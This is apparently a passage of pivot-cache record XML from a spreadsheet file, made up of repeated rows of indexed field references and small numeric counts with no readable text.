  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="80"/>
    <x v="326"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="326"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="326"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="326"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="326"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="327"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="327"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="327"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="327"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="327"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="328"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="328"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="328"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="328"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="328"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="328"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="328"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="329"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="329"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="329"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="329"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="329"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="29"/>
    <x v="329"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="329"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="329"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="330"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="330"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="330"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="330"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="37"/>
    <x v="323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="331"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="331"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="331"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="331"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="332"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="332"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="332"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="332"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="333"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="333"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="333"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="334"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="334"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="334"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="335"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="335"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="335"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="7"/>
    <x v="335"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="335"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="335"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="335"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="335"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="25"/>
    <x v="336"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="336"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="336"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="336"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="336"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="208"/>
    <x v="336"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="336"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="336"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="337"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="338"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="338"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="338"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="32"/>
    <x v="338"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="23"/>
    <x v="338"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="338"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="338"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="339"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="339"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="339"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="339"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="340"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="100"/>
    <x v="340"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="340"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="340"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="340"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="341"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="342"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="342"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="342"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="342"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="343"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="343"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="343"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="343"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="19"/>
    <x v="344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="54"/>
    <x v="344"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="32"/>
    <x v="344"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="344"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="344"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="150"/>
    <x v="344"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="200"/>
    <x v="344"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="344"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="344"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="345"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="345"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="345"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="345"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="345"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="37"/>
    <x v="345"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="345"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="345"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="346"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="346"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="346"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="346"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="346"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="347"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="347"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="347"/>
  </r>
